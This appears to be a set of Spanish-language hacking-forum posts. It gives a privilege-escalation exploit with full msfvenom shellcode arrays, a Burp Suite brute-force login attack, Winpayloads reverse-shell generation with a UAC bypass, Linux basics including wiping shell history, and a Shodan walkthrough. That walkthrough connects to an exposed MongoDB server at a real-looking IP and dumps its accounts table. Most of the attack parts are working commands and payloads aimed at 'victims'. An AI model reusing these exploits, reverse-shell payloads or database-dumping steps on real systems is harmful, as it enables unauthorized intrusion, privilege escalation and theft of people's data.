Lo primero que debemos hacer ver la fuente del archivo en 40616.c, lo puede hacer en cualquier editor de texto, en mi caso lo abrí por Sublime Text, para que puedan ver lo principal. 



Vemos que el exploit esta generado en msfvenom quiere decir que es un payload.

Este exploit funciona de la siguiente manera, notaron que hay 2 payloads de 64 y 32 bits, por default el de 64bits esta sin comentarios cabe decir que funcionara solamente para esa arquitectura, ya que el de 32 bits esta comentado y no ejercerá ninguna función.


64bits
Código: php

/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;


32bits

Código: php

/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/


En esta prueba de concepto, estoy exponiendo un sistema "UBUNTU 32BITS", cabe decir que eliminare el payload de 64 bits con todos sus atributos, para quedarme solamente con la arquitectura de 32bits:



ojo: también eh eliminado los comentarios del payloads de 32 bits.

luego de guárdalo pasaremos a compilar el archivo .c

Código: php
root@kali:~# gcc 40616.c -o 40616 -pthread 




Una ves compilado correctamente, podemos subirlo al servidor de la victima creo que no hay necesidad de pasar a ese proceso ya que existen muchas maneras de hacerlo, si no sabes te invito a buscar los artículos de metasploit framework, en el blog.



Ustedes pueden crear su payload en formato linux, ya que deben hacerlo para poder ejecutar formatos compilados con permisos.



Creando payload en linux 32bits

Código: php

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=8081 -f elf > /root/Desktop/shell.elf




Estableciendo conexión meterpreter

Código: php
msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.35
msf exploit(handler) > set LPORT 8081
msf exploit(handler) > exploit




Entonces le enviaremos nuestro payload a nuestra victima, en el momento que la victima ejecute tendremos su sesión meterpreter:



entramos a terminal y ejecutamos el "Exploit", vemos que se ejecuto correctamente, hemos escalado los privilegios root y por ende tenemos todos los permisos.

Siempre es bueno enseñar pruebas de todo, ejecutaremos el exploit en la misma maquina con un usuario llamado prueba:

./40616



El exploit funciono correctamente, esto fue todo estimados lectores espero les halla encantado este post.
#19
Hacking / Elaborando un ataque Brute Force en BurpSuite
Diciembre 03, 2016, 08:44:34 PM


Saludos nuevamente hermanos de underc0de en esta oportunidad les enseñare a elaborar un ataque de fuerza bruta en plataformas web, con Burpsuiete.

Burpsuite es una herramienta creada en java, que tiene como objetivo fundamental auditar cualquier plataforma web, capturando los datos que se envíen para posteriormente ejecutar ataques.

Si deseas aprender a utilizar esta herramienta puedes visitar el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Elaborar un MITM:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Utilizar Burpsuite con Tor
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

antes de empezar les recomiendo que lean el primer post para que vayan configurando el proxy de Burpsuite en su navegador.

Plataforma para el ataque




como vemos esta plataforma es la escogí para elaborar la prueba de concepto, bueno ya hecho todo lo anteriormente mencionado, añadiremos cualquier credencial, lo importante es darle clip al botón y capturar los datos.



Luego de hacer todo lo siguiente, nos iremos al Burpsuite para ver lo capturado.



vemos que nos arrojo las respuesta que hemos enviado, lo que nosotros unicamente nos importa es la ultima linea:

usuario=admin&contra=123456

esta fue la credencial sin validez que añadí, entonces señalaremos todo el texto, le daremos anticlip y escogeremos la opción "Send Intruder" y nos dirigiremos a la pestaña "Positions":



vemos que se marcan 3 lineas una de Cookie y las de abajo de las credenciales, en nuestro caso nosotros debemos quedarnos con las lineas:

usuario=§admin§&contra=§123456§

para ello pueden señalar toda la linea cookie y darle en "Clear $", o simplemente darle "Clear $" sin señalar nada eliminando todo los payloads escogidos por default y señal solamente los parámetros usuario y contra.

si notaron bien en la anterior imagen en la barra de "Attack Type", esta en Sniper, nosotros la cambiaremos por "Cluster Bomb".



debe quedar de la siguiente manera luego de ello entraremos a la pestaña "Payloads"


Deseo aclarar lo siguiente en la barra Payload set, Se activaran la cantidad de payloads escogidos en pestaña "Positions" en nuestro caso fueron "2".

Aquí viene nuestra arma principal nuestro "Diccionario"
le daremos en el boton de abajo donde dice "load" y cargaremos nuestro diccionario.

el primer payload fue "usuario" >> user.txt



El segundo payload fue "contra" >> pass.txt



El proceso se debe repetir para ambos, ya que son payloads diferentes, luego de ello le daremos en el botón "Start attack".

entonces se empezara nuestro ataque de fuerza bruta.



Vemos que estamos elaborando el ataque  y tenemos respuestas "200", que en su mayoría son peticiones comunes estáticas de un modelo.

pero si observamos la linea señalada esta con respuesta "302", significa que hemos entrado a un modelo diferente de donde hemos estado, en ciertas palabras conectándonos al panel administrativo.

Credencial correcta:

usuario=admin&contra=jacky

HTTP/1.1 302 Found
Date: Mon, 14 Nov 2016 01:33:19 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: admin/Administrador.php
Content-Length: 3884
Connection: close
Content-Type: text/html




Esto fue todo amigos, no olviden compartir la pagina y dejar su comentario.
agradecer no cuesta nada.

Saludos!!
#20


Saludos mis fieles lectores en esta oportunidad, a pedidos de algunos seguidores de la fan page, enseñare a como crear tu laboratorio virtual desde tu sistema, cabe decir que los complementos utilizados en este escenario están disponibles para cualquier sistema operativo.


Para cualquier investigador de seguridad la mejor manera de auditar una plataforma es que este alojada en su propio laboratorio de pruebas por excelencia.


Emular sistemas operativos:


En este primer escenario sin duda es uno de los mas importantes en la rama de la seguridad informática, ya que se enfoca principalmente en sistemas públicos y privados, para encontrar fallas que afecten la privacidad de millones de usuarios y a su vez contengan puertas traseras (Backdoors).

Vulnerabilidades como el Shellshock, hasta el ultimo encontrado denominado Dirty COW se han encontrado en laboratorios virtuales por investigadores independientes.

Herramientas de emulación de sistemas operativos:

Vmware



Es una filial de EMC Corporation (propiedad a su vez de Dell Inc) que proporciona software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma mac OS que corre en procesadores Intel, bajo el nombre de VMware Fusion


Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Virtualbox



Oracle VM VirtualBox es un software de virtualización para arquitecturas x86/amd64, creado originalmente por la empresa alemana innotek GmbH.

Referencia:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estos 2 emuladores mencionados son los mejores y mas utilizados a nivel mundial, puedes emular cualquier sistema operativo.



Sistemas operativos recomendados:


Microsoft Windows

    Windows XP
    Windows 7
    Windows 8
    Windows 10

GNU/Linux

    Ubunto
    Debian
    ArchLinux

Mac OS
      Mac OS X Yosemit

Android

      Android 6.0 Marshmallow



Todos los sistemas mencionados los pueden descargar en archivo de imagen .ISO en sus paginas oficiales.

Si deseas explotar algunos fallos encontrados les recomiendo utilizas versiones "Antiguas", y empezar a testar.



Por el momento estos distros los tengo corriendo para mis pruebas de Testing.

Distros vulnerables para pruebas de Penetration Pestesting:


Existen pequeñas organizaciones que han diseñado sus propios sistemas vulnerables una de ellas es For Pentester y Owasp.

Si desean descargar cualquier distro con fallas conocidas corriendo en dicho sistema no dudes en visitar la pagina:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero sin duda una de las usadas hasta el momento es metasploitable



Metasploitable es una máquina virtual Linux intencionadamente vulnerables. Esta máquina virtual se puede utilizar para llevar a cabo la formación en seguridad, herramientas de seguridad de prueba, y practicar técnicas de pruebas de penetración común.

Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Auditar plataformas Web

El mundo del internet avanza demasiado tecnológicamente hablando, desde que se crearon plataformas web se optimizaron varios procesos que en la vida cotidiana eran muy molestos como por ejemplo depositar dinero en una cuenta, teníamos que hacer horas de cola, pero ahora no es así desde tu dispositivo móvil o tu ordenador puedes hacer eso en menos de 5 segundos por medio de una plataforma web de tu banca online.

La gran pregunta es: ¿Mis datos son seguros? ¿alguien puede obtener mis credenciales? ¿Hackearon la pagina del banco?

Pues si, estas preguntas son las mas frecuentes que cualquier usuario se preguntaría, entonces viene el gran reto de un investigador de seguridad.

"Reportar fallos que perjudican a los usuarios a nivel mundial y mejorar la seguridad informática día a día".

CMS -  Sistemas de gestión de contenidos


Los CMS o Sistemas de gestión de contenidos son plataformas dedicadas especialmente para crear estructuras de soporte y administración de contenidos, principalmente en paginas web.

Existen varias plataformas las mas conocidas son.

Joomla, Wordpress, Drupal, etc.


Como bien sabemos existen varias vulnerabilidades en Plugins y complementos de los mencionados "CMS", ustedes pueden verificar en esta pagina dedicada a Exploits en todo tipo de plataformas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

digamos que para un investigador de seguridad web es fundamental tener algunos de estos gestores en su localhost para investigar posibles fallos y encontrar algunos 0days.

Descargar Plugins Joomla:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar Plugins Wordpress:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Joomla



Joomla es un sistema de gestión de contenidos (o CMS, por las siglas en inglés, Content Management System) que permite desarrollar sitios web dinámicos e interactivos. Permite crear, modificar o eliminar contenido de un sitio web de manera sencilla a través de un "panel de administración". Es un software de código abierto, programado o desarrollado en PHP y liberado bajo Licencia pública general GNU (GPL).

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Wodpress:



WordPress es un sistema de gestión de contenidos o CMS (por sus siglas en inglés, Content Management System) enfocado a la creación de cualquier tipo de sitio. Originalmente alcanzó una gran relevancia usado para la creación de blogs, para convertirse con el tiempo en una de las principales herramientas para la creación de páginas web comerciales.

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pentesting en plataformas Web

Existen aplicaciones vulnerables web desarrolladas para realizar pruebas de Pentesting, en su mayoría la organización Owasp ha desarrollado buenos ejemplares, como también grupos independientes.

bWAPP



bWAPP, o una aplicación web con errores, es una fuente libre y abierto deliberadamente aplicación web insegura.
Ayuda a entusiastas de la seguridad, los desarrolladores y los estudiantes para descubrir y para prevenir vulnerabilidades web.
bWAPP lo prepara a uno para realizar pruebas de penetración exitosa y proyectos de hacking ético.

Lo que hace tan único bWAPP? Bueno, tiene más de 100 vulnerabilidades web!
Cubre todas las principales web bugs conocidos, incluyendo todos los riesgos del proyecto OWASP Top 10.

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Damn Vulnerable Web Application



Es una aplicación web PHP / MySQL que es maldita vulnerables. Su objetivo principal es ser una ayuda para los profesionales de la seguridad para poner a prueba sus habilidades y herramientas en un entorno jurídico, ayudar a los desarrolladores web a comprender mejor los procesos de asegurar las aplicaciones web y para ayudar tanto a los estudiantes y profesores para aprender acerca de la seguridad de aplicaciones web en una clase controlada ambiente de la sala.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SQLi-Labs avanzado



SQLI-LABS es una plataforma para aprender SQLI Siguiendo laboratorios que están cubiertos para parametros GET y POST.

los escenarios son los siguientes:

        Error Based Injections (Union Select)
        String
        Intiger
        Error Based Injections (Double Injection Based)
        BLIND Injections: 1.Boolian Based 2.Time Based
        Update Query Injection.
        Insert Query Injections.
        Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
        Second Order Injections
        Bypassing WAF
        Bypassing Blacklist filters Stripping comments Stripping OR & AND    Stripping SPACES and COMMENTS Stripping UNION & SELECT
        Impidence mismatch
        Bypass addslashes()
        Bypassing mysql_real_escape_string. (under special conditions)
        Stacked SQL injections.
        Secondary channel extraction

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso, con las plataformas mencionadas doy mis clases y charlas de seguridad informática y te los recomiendo mucho.

como lo dijo un grande de seguridad Informática, el gran chema alonso:

" Leer, Practicar y ser constante. "


Dejare su vídeo dando algunos consejos para empezar en el mundo de la seguridad informática & Hacking.



Saludos y éxitos para todos, no olvides compartir el blog y dejar un comentario.
agradecer no cuesta nada, Saludos.
#21


Saludos hermanos de underc0de, hoy es mi full day de post's xD,  en esta oportunidad les traigo una herramienta llamada "WInPayloads" creada en python, su función principal es crear "Payloads" unicamente para la plataforma Windows, su uso es sencillo como un framework lo interesante de ello, es su constante actualización y las nuevas funciones que se añaden en cada repertorio.

Descarga:

Código: php
root@kali:~/Winpayloads# git clone https://github.com/nccgroup/Winpayloads.git 


Luego de descargar su respectivo modulo, pasaremos a entrar a la carpeta e instalaremos los requisitos y dependencias necesarias.

Código: php
root@kali:~/Winpayloads# ./setup.sh




Bueno ya instalado todo lo necesario, pasaremos a ejecutar el archivo.



lo peculiar de esta herramienta es que todo esta automatizado, cabe decir que es una herramienta para personas ocupadas como nosotros y deseemos optimizar los procesos.

en esta prueba de concepto escogeré la opción 2:

2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]

configurando nuestro payload




vemos que nos aparecen 2 lineas que nos pregunta que puerto de escucha y IP deseamos añadir, en si las opciones te llegan configuradas, pero si deseas añadir tu puerto de escucha puedes personalizarlo, como también añadir tu  IP publica para ataques fuera de la red (WAN)
 
En mi caso escogí el puerto 8081 y deje mi IP por default para estatblecer nuestros datos de conexión en nuestro payload.   

Luego de configurar esos datos, nos aparecerá la penúltima linea:

  • Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y[/color]

    No hay necesidad de explicar lo siguiente, porque esta bien claro, nos pregunta si deseamos utilizar un exploit Bypass UAC para obtener todos los privilegios, yo le añadí que si.

    • Payload.exe Has Been Generated And Is Located Here: /etc/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
      [/color]
      El archivo se genero en la carpeta de raiz:  /etc/winpayloads

      Para terminar nos aparece la siguiente linea:

      Upload To Local Websever or (p)sexec? [y]/p/n: y

      lo pregunta es, si deseamos crear un servidor web local de escucha para subir nuestro payloads y poder enviarlo a nuestro victima, yo le añadí si.

      Serving Payload On No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Vemos que nos arrojo la ruta del payload corriendo, luego de ello se abrirá metasploit framework con nuestra configuración añadida:



      Solo nos quedara enviar el payloads a nuestra victima pueden utilizar MITM, si estas en tu red local o cualquier otro medio, si no sabes como te invito a buscar en el blog los artículos mencionados.



      Luego que nuestra victima ejecute el exploit: ojo ustedes pueden cambiarle el nombre, aclaro esto porque tengo un "critico" con micronocimientos que comenta a cada momento un post mio, jajaja.

      Bueno en el momento que nuestra victima ejecute el payloads tendremos su sesión meterpreter 1, pero en segundo plano se estará ejecutando el modulo del Bypass UAC:



      vemos que nuestro bypass se ejecuto correctamente, espero les halla gustado este pequeño articulo.
      Saludos
#22


Saludos mis queridos hermanos de underc0de, ahora si estoy de vacaciones jajaja, en esta oportunidad haré un POST profundo para que aprendan a utilizar el sistema GNU/Linux, a pedido de muchos seguidores del blog que me han estado dejando mensajes privados, coordinadamente atenderé sus necesidades porque gracias a cada uno de ustedes, soy lo que soy en estos momentos, sin mas que decir vamos a explicar un poco la historia del Software Libre.



El software libre es una ideología que surgió en los años 80, su ideología única es respetar la libertar del usuario, luchando contra la venta y utilización del software privativo, impulsada por el padre del software libre Richard Stallman creando una comunidad social de solidaridad que han revolucionado la historia de la informática como la conocemos, desde ese punto de ideología tenemos los famosos lenguajes de programación "Open Source" y algo completamente importante para usuarios como yo, el sistema "UNIX" que es el S.O primitivo creado por Linux Torvalds, que en ese entonces fue un sistema comercial.

posteriormente paso a llamarse "GNU" por la implementación del kernel del sistema UNIX de Torvalds al sistema operativo de los desarrolladores de software libre teniendo como líder a Richard Stallman,  para que GNU pueda funcionar de una manera correcta y pasar desde entonces como "EL SISTEMA LIBRE" que revoluciono las medidas de seguridad y el manejo de libertar del usuario.

Richard Stallman es una revolucionario informático, que actualmente lucha contra grandes gobiernos y empresas como Microsoft que nos privan de nuestra privacidad, como a su vez tratan de añadirnos puertas traseras a nuestros sistemas para poder expiarnos.



Esta es la frase célebre del padre del software que por mi parte me encanto:

"¿Por qué quiere regalar Microsoft copias casi gratuitas (de su programa) a escuelas y niños?, es como regalar drogas adictivas, ya que la primera dosis es gratis pero, después de ser dependiente, tienes que pagar."

Existen 4 libertades  que se deben cumplir:



  • Libertad 0. Libertad de ejecutar el programa como desees.


  •     Libertad 1. Libertad de estudiar el código fuente del programa y realizar los cambios que desee el programador.


  • Libertad 2. Libertad de ayudar a tu programa. Crear copias exactas del programa y distribuirlas bien gratuitamente o con la libertad de vender tu desarrollo. Estas dos opciones están permitidas por la comunidad.


  • Libertad 3. Libertad para contribuir a tu Comunidad. Hacer copias de tus versiones modificadas y distribuirlas entre los demás.



Antes de comenzar a dar tus primeros pasos en GNU, te recomiendo emularlo en tu sistema nativo por el momento, te sugiero utilizar ubuntu, Debian por que plataforma es bastante útil y sencilla.

Los pueden descargar en sus paginas oficiales:

Ubuntu:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Debian:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comandos de navegación:


cd     - Entrar a una carpeta.
cd ..  - Salir de carpeta y volver a un directorio anterior.
cd /   - Dirigirse a la carpeta raíz del sistema. 
ls      - Ver todos archivos & directorios.
ls -la - Ver todos archivos & directorios(ocultos) con sus respectivos permisos.




Comandos de manipulación de datos:

mkdir - permite crear una carpeta.
rm -f   - permite eliminar un archivo.
rm -r  - permite eliminar un directorio.




touch - permite crear un archivo 




Aprendamos un poco sobre los permisos:

En GNU, la gestión de permisos de usuarios y los grupos de usuarios tienen sus carpetas y archivos, se realizan con los siguientes tipos de permisos.

    Permiso de Lectura
    Permiso de Escritura
    Permiso de Ejecución


permiso de lectura se representa con la letra r que en ingles es "Read" - "Leer".

permiso de Escritura se representa con la letra w que en ingles es "Write" - Escritura.

permiso de ejecución se representa con la letra x que en ingles es "Execute" - Ejecución.

Código: php
root@kali:~/tutorial# chmod 664 * byass.txt



Propietario: lectura y escritura
Grupo: lectura
Resto: lectura

Código: php
root@kali:~/tutorial# chmod 775 * login.txt


Propietario: lectura, escritura y ejecución
Grupo: lectura y ejecución
Resto: lectura y ejecución


Código: php
root@kali:~/tutorial# chmod 777 * password.txt


Propietario: lectura, escritura y ejecución
Grupo: lectura, escritura y ejecución
Resto: lectura, escritura y ejecución



Si desean verlo con profundidad pueden ver el siguiente articulo aquí
otra cosa muy importante si es que una carpeta o un archivo necesite permisos administrativos para abrirse y tu eres root, debes ejecutar el comando sudo para poder leerlo, abrirlo o ejecutarlo.

Código: php
root@kali:~/# sudo nano abrirme.log


Instalar herramientas:

En GNU hay 3 formas de instalar una herramienta una de ellas es de forma gráfica con archivos run, "ejecutables" en entorno GUI.



Existen 2 formas de instalar por la terminal, uno que con lleva a instalaciones por repertorios y la otra por archivo .deb formado de paquetes.

Instalar por "APT"
Código: php

root@kali:~# apt-get install iceweasel




¿Muy sencillo verdad?.

Explicare algo bien resumido, el navegador iceweasel se instalado por el simple hecho que se encuentra añadido en nuestro repositorio, si nosotros instalamos una herramienta como virtualbox, etc no lo reconocerá porque no esta añadido:

Código: php
root@kali:~# nano /etc/apt/sources.list 





en ese archivo podemos añadir repositorios nuevos, actualizar nuestro repertorio para poder instalar la herramienta nueva con:

Código: php
root@kali:~# apt-get update         
                   

Si deseas desintalarlo y eliminarlo de manera permanente junto con sus archivos lo puedes hacer de la siguiente manera:

Código: php
root@kali:~/# apt-get remove firefox  --purge



Ahora nos queda la ultima, podemos instalar también herramientas en forme paquetes, que no estén añadidos en algún repositorio, descargado su instalador como por ejemplo: ninja-ide
Código: php

root@kali:~/Downloads# dpkg -i ninja-ide_2.3+r597~saucy1_all.deb




bastante sencillo verdad, si deseas desintalarlo lo puedes hacer de la siguiente manera:

Código: php
root@kali:~/# dpkg -r ninja-ide


ahora imagínese que desee instalar una herramienta de 64bits y usted tiene de 32bits, puede hacerlo volviendo su sistema multiplataforma.

"multiarch" Multi-arquitectura.

Primero debe instalar para proceder a elaborar el multiarch

Código: php
root@kali:~# apt-get install dpkg


Para ver que arquitectura ponemos.
Código: php

root@kali:~# dpkg --print-foreign-architectures


Yo le quiero añadir la arquitectura amd64.
Código: php

root@kali:~# dpkg --add-architecture amd64


Si deseas instalar una herramienta con dicha arquitectura.
Código: php

root@kali:~# apt-get install wine:amd64


Si deseas eliminar alguna arquitectura:

Código: php
root@kali:~# dpkg --remove-architecture arquitectura


si deseas saber los datos de red, lo puedes hacer ejecutando:
Código: php

root@kali:~# ifconfig 




como vemos estoy utilizando eth0 red por cableado, si deseo activar o prender mi conexión inalámbrica - wlan0 lo puedes hacer ejecutando lo siguiente:

Código: php
root@kali:~# ifconfig  wlan0 up


Si deseas apagarlo lo puedes hacer de la siguiente manera:

Código: php
root@kali:~# ifconfig  wlan0 down 


muy sencillo verdad lo puedes hacer mediante wlan0 como eth0.

manipulación servicios

por ejemplo si nosotros trabajamos con un servicio como apache2 o servicios de base de datos como de red, debemos siempre activarlos para que puedan correr en nuestros sistemas.

Para activar nuestro servicio:

Código: php
root@kali:~# service apache2 start


Para ver el estado de nuestro servicio:

Código: php
root@kali:~# service apache2 status


Para detener nuestro servicio:

Código: php
root@kali:~# service apache2 stop




Optimizar nuestros procesos

Si bien sabemos en GNU no consumimos muchos recursos dependiendo de que procesos estamos corriendo en vivo, debemos saber que Linux trae su propio optimizador de procesos.


Primero veamos cuanta memoria se esta ejecutando en el sistema:

Código: php
root@kali:~# watch -n 1 free -m


si se fijan ustedes en su terminal, verán sus resultados entonces si nosotros deseamos optimizar los procesos que no se ejecutan de forma principal los podemos cerrar de la siguiente manera borrando los caches de la raw.

Código: php
root@kali:~# sync && sysctl -w vm.drop_caches=3


Una cosa importante cada ves que ejecuten comandos en la terminal - Shell, se registra todo.

Puedes ver todas esas lineas de la siguiente manera.

Código: php
root@kali:~# history




Si no te gustan tales lineas puedes eliminar todas de la siguiente manera:

Código: php
root@kali:~# cat /dev/null > ~/.bash_history


Digamos que solamente desea eliminar algunas lineas, por ejemplo la linea 1995 lo puedes hacer de esta manera:

Código: php
root@kali:~# history -d 1995 


Bueno mis estimados lectores con estos pasos que les eh enseñado los ayudara demasiado a comprender y poder navegar por la terminal de GNU sin ningún problema.

Nuevamente es un agrado cumplir con ustedes, son las 5:20 am y no eh dormido casi nada xD

Saludos y éxitos para todos, no olvides compartir el blog y dejar tu comentario.
Agradecer no cuesta nada.
#23
Pentesting / Pentesting con Shodan & Exploits funcionales
Noviembre 07, 2016, 12:14:00 AM


Saludos hermanos de underc0de luego de un largo tiempo de vacaciones nuevamente estoy retomando el foro, es un placer nuevamente servirles como lo eh estado asiendo, aparte vi que cerraron un post mio, con unos comentarios de lamerines que ni siquiera saben lo que es un Exploit / POST-EXPLOTACION. xD

Sin mas que decir, hoy tocaremos el tema sobre "SHODAN" en su modo Pentesting, utilizando Exploits funcionales que les ayudara  a comprender y auditar servidores vulnerables que existen.

Si deseas aprender lo basico de shodan puedes visitar el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en primer lugar antes de pasar con la metodología de explotación, tendremos un "Extra" con un gestor de base de datos "poco conocido por algunos", pero utilizados por servidores grandes & pequeños.

MONGODB:


MongoDB es un sistema de base de datos NoSQL orientado a documentos, desarrollado bajo el concepto de código abierto. MongoDB forma parte de la nueva familia de sistemas de base de datos NoSQL

fuente & más información:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

como sabemos MongoDB es un sistema de DB basado en el concepto Open source, pero porque tal gestor esta en este POST.


En su plataforma web, shodan tiene varias secciones donde podemos interactual con ellos, un claro ejemplo es "Databases":

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Podemos ver que nos muestra servicios conocidos tales como "MySQL" y "PostgreSQL" denominado (El Oracle OpenSource).

Entre otros el que utilizaremos en esta prueba de concepto "MongoDB",etc.

Ustedes poden darle "CLIP" al servicio mongoDB O simplemente utilizar su "DORK" para una búsqueda personalizada.

product:MongoDB



Podemos observar en la imagen solo nos muestra "2" resultados, que si lo leen bien tenemos lo que se le denomina "FUGA DE INFORMACIÓN".


¿Que es una fuga de información?


Son datos de información delicados o sensibles de un servicio privado que se muestra por motivos humanos o directorios mal protegidos, pero en su gran mayoria existen servicios que muestran tales datos como lo es MongoDB:


Target:
Código: php

173.208.176.236
Database Name Size
zakey 49.8 GB
local 2.1 MB
admin 1 byte

   

Tenemos: LA IP y las base de datos que nos arroja directamente, si bien sabemos que un servidor con credenciales no arroja mas halla que un panel de usuario, porque en esta busqueda nos arroja datos sensibles.

Es simple, porque al buscar el producto MongoDB, shodan empieza a recopilar la información de tal gestor de base de datos, que tiene una mala configuración de seguridad.

¿como podemos "Acceder" a los servicios vulnerables?

bueno es simple, si estas en GNU puedes instalar el servicio mongoDB de la siguiente manera:

Código: php
root@kali:~# apt-get install mongodb


una ves instalado, debemos activar el servicio de la siguiente manera:

Código: php
root@kali:~# service mongodb start


luego de activar el servicio, como puedes ver si esta activado pues es simple:

Código: php
root@kali:~# service mongodb status

   


como vemos en la imagen nuestro servicio esta activo, ahora como lo conectamos a nuestro victima.

En esta prueba de concepto nuestra victima sera:   

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Conectando al servidor de nuestra victima:

Código: php
root@kali:~# mongo --host 104.155.198.131




como vemos que nos hemos conectado al servidor por medio de la shell, ahora les enseñare el proceso de sintaxis de mongodb para poder interactuar en la base de datos.



Código: php
 > show dbs      
                - ver todas las base de datos.

Código: php
 > use shop                    
   - Escoger la base de datos para interactuar.


Código: php

> show tables   
                        - ver tas tablas de la base de datos.


Código: php
 > db.accounts.findOne() 
- Extraer todos los atributos de una tabla.

Lo primero que hice fue establecer una vista a las base de datos del servidor, posteriormente escogí la base de datos llamada "shop", luego ejecute show tables para ver todas las tablas que tiene y sin dudar dumpie los datos de la tabla "accounts" y pude obtener los atributos de dicha credencial:

